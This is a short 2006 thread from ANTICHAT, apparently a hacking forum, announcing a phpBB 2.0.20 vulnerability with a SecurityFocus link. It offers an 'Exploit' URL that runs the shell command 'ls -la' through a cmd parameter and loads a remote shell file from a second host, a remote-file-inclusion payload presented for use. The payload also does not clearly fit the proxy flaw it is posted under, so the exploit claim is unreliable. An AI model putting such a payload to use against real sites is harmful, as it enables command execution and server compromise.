phpBB 2.0.20

Discussion in 'Forum for discussion of ANTICHAT' started by neM3Sis, 13 May 2006.

  1. neM3Sis

    neM3Sis Member

    Joined:
    2 May 2006
    Messages:
    15
    Likes Received:
    8
    Reputations:
    4
    PHPBB Unauthorized HTTP Proxy Vulnerability
    http://www.securityfocus.com/bid/17965/info

    phpBB is prone to a vulnerability that could permit it to become an unauthorized HTTP proxy.
    An attacker can exploit this issue to manipulate phpBB into becoming an HTTP proxy.

    Exploit :

    Code:
    http://www.example.com/somescript.php?cmd=ls%20-la&xpl=http://www.example2.com/someshell.txt
     
    1 person likes this.
  2. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
    This is a famous Exploit.....
    10q
     
  3. sasi

    sasi New Member

    Joined:
    20 Jan 2006
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
Loading...